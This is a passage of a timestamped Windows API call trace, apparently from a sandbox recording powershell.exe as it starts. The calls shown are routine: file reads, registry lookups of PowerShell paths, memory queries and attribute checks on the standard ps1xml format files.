lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.956] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.956] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.957] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.957] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.957] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.958] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.958] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1b4, lpOverlapped=0x0) returned 1 [0249.958] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x0, lpOverlapped=0x0) returned 1 [0249.958] CloseHandle (hObject=0x330) returned 1 [0249.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0249.959] SetErrorMode (uMode=0x1) returned 0x1 [0249.959] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf00 | out: lpFileInformation=0x16cf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0249.959] SetErrorMode (uMode=0x1) returned 0x1 [0249.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0249.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cfe8 | out: phkResult=0x16cfe8*=0x330) returned 0x0 [0249.980] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf6c, lpData=0x0, lpcbData=0x16cf68*=0x0 | out: lpType=0x16cf6c*=0x1, lpData=0x0, lpcbData=0x16cf68*=0x56) returned 0x0 [0249.980] CoTaskMemAlloc (cb=0x5a) returned 0x379a30 [0249.980] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf3c, lpData=0x379a30, lpcbData=0x16cf38*=0x56 | out: lpType=0x16cf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cf38*=0x56) returned 0x0 [0249.980] CoTaskMemFree (pv=0x379a30) [0249.981] RegCloseKey (hKey=0x330) returned 0x0 [0249.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0249.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0250.440] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.710] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.740] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.741] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.743] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.745] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.758] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.777] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.806] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.809] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.811] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.812] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.814] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.816] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.823] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.824] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.848] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.869] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.870] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.870] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.871] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.872] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.873] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.873] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.874] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.875] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.875] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.876] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.876] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.877] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.880] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.884] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.884] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.885] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.886] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.409] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.410] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.411] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.447] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0251.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0251.447] CoTaskMemFree (pv=0x343980) [0251.469] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.518] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.519] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.519] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.520] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.521] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.521] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.523] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.525] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0251.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d188 | out: phkResult=0x16d188*=0x30c) returned 0x0 [0251.527] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x16d19c, lpData=0x0, lpcbData=0x16d198*=0x0 | out: lpType=0x16d19c*=0x1, lpData=0x0, lpcbData=0x16d198*=0x74) returned 0x0 [0251.527] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x16d10c, lpData=0x0, lpcbData=0x16d108*=0x0 | out: lpType=0x16d10c*=0x1, lpData=0x0, lpcbData=0x16d108*=0x74) returned 0x0 [0251.527] CoTaskMemAlloc (cb=0x78) returned 0x399290 [0251.527] RegQueryValueExW (in: hKey=0x30c, lpValueName="path", lpReserved=0x0, lpType=0x16d0dc, lpData=0x399290, lpcbData=0x16d0d8*=0x74 | out: lpType=0x16d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d0d8*=0x74) returned 0x0 [0251.527] CoTaskMemFree (pv=0x399290) [0251.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0251.527] SetErrorMode (uMode=0x1) returned 0x1 [0251.528] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0251.528] SetErrorMode (uMode=0x1) returned 0x1 [0251.529] SetErrorMode (uMode=0x1) returned 0x1 [0251.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0251.530] SetErrorMode (uMode=0x1) returned 0x1 [0251.531] SetErrorMode (uMode=0x1) returned 0x1 [0251.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0251.532] SetErrorMode (uMode=0x1) returned 0x1 [0251.532] SetErrorMode (uMode=0x1) returned 0x1 [0251.532] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0251.535] SetErrorMode (uMode=0x1) returned 0x1 [0251.536] SetErrorMode (uMode=0x1) returned 0x1 [0251.536] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0251.536] SetErrorMode (uMode=0x1) returned 0x1 [0251.537] SetErrorMode (uMode=0x1) returned 0x1 [0251.537] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0251.537] SetErrorMode (uMode=0x1) returned 0x1 [0251.538] SetErrorMode (uMode=0x1) returned 0x1 [0251.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0251.538] SetErrorMode (uMode=0x1) returned 0x1 [0251.539] SetErrorMode (uMode=0x1) returned 0x1 [0251.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d060 | out: lpFileInformation=0x16d060*(dwFileAttributes=0x20, 